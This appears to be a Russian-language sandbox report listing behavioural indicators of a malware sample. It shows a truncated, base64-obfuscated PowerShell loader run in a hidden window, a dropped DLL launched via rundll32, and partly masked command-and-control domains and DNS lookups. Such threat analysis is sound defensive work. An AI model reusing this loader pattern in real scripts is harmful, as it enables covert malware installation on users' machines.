Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGMAcgB1AHYAYwA0AD0AKAAnAEwAJwArACgAJwB2AGQAcAB2ACcAKwAnAGwAJwApACsAJwBzACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAVQBzAGUAcgBwAFIATw...
- %HOMEPATH%\rueriuc\z2zl_zt\mzotlo.dll
- 'be######ologeraacharyji.com':443
- 'th####enlady.org':443
- 'vo####reight.co.za':443
- '14#.#64.126.197':443
- DNS ASK be######ologeraacharyji.com
- DNS ASK th####enlady.org
- DNS ASK vi#####aitibagari.com
- DNS ASK vo####reight.co.za
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABYAGMAcgB1AHYAYwA0AD0AKAAnAEwAJwArACgAJwB2AGQAcAB2ACcAKwAnAGwAJwApACsAJwBzACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAVQBzAGUAcgBwAFIATw...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Rueriuc\Z2zl_zt\Mzotlo.dll 0